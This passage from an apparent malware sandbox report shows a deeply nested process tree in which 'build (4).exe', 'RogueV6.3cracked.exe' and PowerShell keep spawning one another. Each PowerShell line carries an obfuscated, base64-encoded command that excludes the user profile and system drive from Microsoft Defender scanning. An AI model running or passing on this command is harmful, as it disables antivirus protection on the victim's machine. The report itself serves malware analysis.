        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        57⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        57⤵
        Executes dropped EXE
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        57⤵
        Loads dropped DLL
        
        PID:1780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        58⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        58⤵
        Executes dropped EXE
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        58⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        59⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        59⤵
        Executes dropped EXE
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        59⤵
        Loads dropped DLL
        
        PID:1520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        60⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        60⤵
        Executes dropped EXE
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        60⤵
        Loads dropped DLL
        
        PID:2284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        61⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        61⤵
        Executes dropped EXE
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        61⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        62⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        62⤵
        Executes dropped EXE
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        62⤵
        Loads dropped DLL
        
        PID:1520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        63⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        63⤵
        Executes dropped EXE
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        63⤵
        Loads dropped DLL
        
        PID:3204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        64⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        64⤵
        Executes dropped EXE
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        64⤵
        Loads dropped DLL
        
        PID:3348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        65⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        65⤵
        Executes dropped EXE
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        65⤵
        
        PID:3468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        66⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        66⤵
        System Location Discovery: System Language Discovery
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        66⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        67⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        67⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        68⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        68⤵
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        68⤵
        System Location Discovery: System Language Discovery
        
        PID:3852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        69⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        69⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        69⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        70⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        70⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        70⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        71⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        71⤵
        System Location Discovery: System Language Discovery
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        71⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        72⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        72⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        72⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        73⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        73⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        73⤵
        
        PID:3408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        74⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        74⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        74⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        75⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        75⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        75⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        76⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        77⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        77⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        77⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        78⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        78⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        78⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        79⤵
        System Location Discovery: System Language Discovery
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        79⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        79⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        80⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        80⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        81⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        81⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        81⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        82⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        82⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
